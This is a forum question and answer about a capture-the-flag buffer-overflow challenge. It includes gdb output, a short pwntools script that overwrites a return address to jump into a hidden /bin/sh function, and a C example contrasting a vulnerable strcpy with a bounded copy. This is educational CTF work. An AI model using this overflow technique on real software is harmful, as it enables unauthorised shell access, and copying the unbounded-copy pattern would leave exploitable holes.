
Sorry if this is the wrong format. I'm currently doing a CTF and have a problem where I have to overflow a buffer to get access to a hidden /bin/sh function, where I then can get a flag.

I think I successfully overflow the buffer, but when I would be getting access to the hidden function I get the following output.

[ Zerochain ]
1. Add Note
2. Delete Note
3. View Note
4. Vulnerable Log
5. Exit
Your choice: 
Breakpoint 1, 0x0000000000401570 in vulnerable_log ()
(gdb) x/xg $rbp
0x7fffffffdc30: 0x00007fffffffdc50
(gdb) c
Continuing.
Enter log message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x00000000004015b6 in hidden_shell ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e045d4 in do_system (line=0x402113 "/bin/sh") at ../sysdeps/posix/system.c:148
warning: 148    ../sysdeps/posix/system.c: No such file or directory

I'm using gdb to get information from the program.
I have also made the following Python program to insert the different data.

import sys
from pwn import p64

# 132 bytes of 0x41 ('A') to fill the log buffer and reach the saved return address
padding = b"\x41" * (123 + 9)
# address of hidden_shell (0x4015b2), packed as 8 little-endian bytes for x86-64
return_address = p64(0x4015b2)
# menu choice 4 ("Vulnerable Log"), then the over-long log message
sys.stdout.buffer.write("4".encode())
sys.stdout.buffer.write(padding + return_address)

Hope someone can help. If you need more information feel free to ask, since I can link both the file and the CTF problem. Thanks ahead!


1 Answer


This is probably a menu-driven program (called Zerochain) offering these options:

1. Add Note
2. Delete Note
3. View Note
4. Vulnerable Log
5. Exit

And here’s what's happening in your gdb session:

You triggered Breakpoint 1 at vulnerable_log():

Breakpoint 1, 0x0000000000401570 in vulnerable_log ()

You checked the base pointer (rbp), and it looks like it points to:

0x7fffffffdc30: 0x00007fffffffdc50

Then you continued (c), and entered a very long input for "Enter log message":

AAAAAAAAAA.... (lots of A's)

After that, you hit Breakpoint 2, this time inside hidden_shell():

Breakpoint 2, 0x00000000004015b6 in hidden_shell ()

That suggests your input redirected control flow to this hidden function!

Then you continued again, and the program ran do_system() with the command /bin/sh:

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e045d4 in do_system (line=0x402113 "/bin/sh")

So the program was trying to execute a shell before crashing.
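The kind of unbounded copy that lets a long "log message" overwrite the saved return address, next to a bounded version that a defender would ship instead. This is an added C example, not the Zerochain binary's source: the real buffer size and function bodies are not on the page, so LOG_MAX and the function shapes are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; the real binary's stack layout is not on the page. */
#define LOG_MAX 128

/* The pattern behind the question: an unbounded copy into a fixed stack
 * buffer. A 132-byte "log message" runs past buf, over the saved rbp and
 * into the saved return address, which is why the program "returned" into
 * hidden_shell(). Shown for contrast only; the tests never call it. */
void vulnerable_log(const char *input) {
    char buf[LOG_MAX];
    strcpy(buf, input);          /* no length check: smashes the stack */
    printf("Logged: %s\n", buf);
}

/* Hardened form: copy at most out_len-1 bytes, always NUL-terminate and
 * tell the caller whether the input was cut, so it can reject it instead
 * of silently storing a truncated message.
 * Returns 1 if truncated, 0 if the input fit, -1 if out_len is 0. */
int safe_log(const char *input, char *out, size_t out_len) {
    if (out_len == 0)
        return -1;
    size_t n = strlen(input);
    int truncated = n >= out_len;
    size_t copy = truncated ? out_len - 1 : n;
    memcpy(out, input, copy);
    out[copy] = '\0';
    return truncated;
}

/* Stand-alone demo: a constructed 132-byte input of 'A', like the one in
 * the gdb session, fed only to the bounded version. */
int main(void) {
    char input[133];
    memset(input, 'A', 132);
    input[132] = '\0';
    char out[LOG_MAX];
    int cut = safe_log(input, out, sizeof out);
    printf("truncated=%d stored=%zu bytes\n", cut, strlen(out));
    return 0;
}
```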

